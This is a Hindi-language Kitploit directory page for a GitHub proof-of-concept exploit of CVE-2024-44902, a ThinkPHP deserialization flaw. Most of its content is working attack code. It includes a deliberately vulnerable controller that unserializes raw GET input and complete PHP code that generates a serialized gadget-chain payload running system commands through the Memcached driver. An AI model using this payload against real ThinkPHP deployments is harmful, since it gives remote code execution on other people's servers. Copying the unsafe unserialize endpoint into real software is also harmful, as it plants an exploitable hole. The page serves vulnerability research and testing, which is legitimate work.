Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-44902 — CVE-2024-44902 के लिए अवधारणा-प्रमाण शोषण, ThinkPHP v6.1.3–v8.0.4 में एक डिसीरियलाइज़ेशन कमजोरी जो Memcached एक्सटेंशन स्थापित होने पर निर्मित पेलोड के माध्यम से रिमोट कोड निष्पादन को सक्षम करती है। | Kitploit
उपकरण/GitHubGitHub/fru1ts/cve-2024-44902
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubfru1ts/cve-2024-44902

CVE-2024-44902

CVE-2024-44902 के लिए अवधारणा-प्रमाण शोषण, ThinkPHP v6.1.3–v8.0.4 में एक डिसीरियलाइज़ेशन कमजोरी जो Memcached एक्सटेंशन स्थापित होने पर निर्मित पेलोड के माध्यम से रिमोट कोड निष्पादन को सक्षम करती है।

रिपॉजिटरी देखें
61 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-44902

कमजोरी का विवरण

Thinkphp v6.1.3 से v8.0.4 में एक डिसीरियलाइज़ेशन कमजोरी हमलावरों को मनमाना कोड निष्पादित करने की अनुमति देती है।

प्रभावित संस्करण

Thinkphp v6.1.3 से v8.0.4

शोषण की शर्त

thinkphp फ्रेमवर्क में Memcached एक्सटेंशन स्थापित होना चाहिए।

कमजोरी का प्रमाणन

  • परीक्षण वातावरण: php8.0.7+thinkphp8.0.4+memcached3.2.0.

सबसे पहले, app\controller\Index.php में एक नया डिसीरियलाइज़ेशन एंडपॉइंट जोड़ें, जैसे:

root@kitploit:~
<?php

namespace app\controller;

use app\BaseController;

class Index extends BaseController
{
    public function index()
    {
        unserialize($_GET['x']);
        return '<style>*{ padding: 0; margin: 0; }</style>';
    }

    public function hello($name = 'ThinkPHP8')
    {
        return 'hello,' . $name;
    }
}

आप payload उत्पन्न कर सकते हैं:

root@kitploit:~
<?php
namespace think\cache\driver;
use think\model\Pivot;
class Memcached{
    protected $options=[];
    function __construct()
    {
        $this->options["username"]=new Pivot();
    }
}

namespace think\model;
use think\model;
class Pivot extends Model
{

}

namespace think;
abstract class Model{
    private $data = [];
    private $withAttr = [];
    protected $json = [];
    protected $jsonAssoc = true;
    function __construct()
    {
        $this->data["fru1ts"]=["whoami"];
        $this->withAttr["fru1ts"]=["system"];
        $this->json=["fru1ts"];
    }
}

namespace think\route;
use think\DbManager;
class ResourceRegister
{
    protected $registered = false;
    protected $resource;
    function __construct()
    {
        $this->registered=false;
        $this->resource=new DbManager();
    }
}
namespace think;
use think\model\Pivot;
class DbManager
{
    protected $instance = [];
    protected $config = [];
    function __construct()
    {
        $this->config["connections"]=["getRule"=>["type"=>"\\think\\cache\\driver\\Memcached","username"=>new Pivot()]];
        $this->config["default"]="getRule";
    }
}

use think\route\ResourceRegister;
$r=new ResourceRegister();
echo urlencode(serialize($r));

payload का उपयोग करके डिसीरियलाइज़ करने से RCE हो सकता है:

image-20240905234416317

टूल डाउनलोड करें